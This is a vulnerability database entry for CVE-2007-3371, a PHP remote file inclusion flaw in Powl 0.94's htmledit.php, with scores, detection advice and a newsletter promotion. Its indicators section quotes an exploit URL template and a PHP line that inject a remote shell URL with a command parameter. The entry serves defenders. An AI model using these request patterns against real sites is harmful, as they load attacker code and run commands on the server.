cbcvebase.
CVE-2007-3371
published 2007-06-22

CVE-2007-3371: PHP remote file inclusion vulnerability in plugins/widgets/htmledit/htmledit.php in Powl 0.94 allows remote attackers to execute arbitrary PHP code via a URL…

PriorityP356high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
71.18%
99.3th percentile
PHP remote file inclusion vulnerability in plugins/widgets/htmledit/htmledit.php in Powl 0.94 allows remote attackers to execute arbitrary PHP code via a URL in the _POWL[installPath] parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
powlpowl

Detection & IOCsextracted from sources · hover to see the quote

pathplugins/widgets/htmledit/htmledit.php
urlhttp://site.com/[path]/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=[Evil_Script>:]
command$kw3 = $path."?_POWL[installPath]=".$shell."?&cmd=".$cmd
  • Detect HTTP requests targeting the vulnerable script path with the _POWL[installPath] parameter containing an external URL (RFI attempt).
  • Monitor for GET requests to htmledit.php that include a URL-like value (http:// or https://) in the _POWL[installPath] query parameter, indicating remote file inclusion exploitation.
  • The exploit appends a trailing '?' and '&cmd=' to the injected shell URL to pass OS commands; look for this double-query-string pattern in web server logs.
  • ·The vulnerability only affects Powl version 0.94; verify the installed version before applying detection rules to avoid false positives on patched or unrelated deployments.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.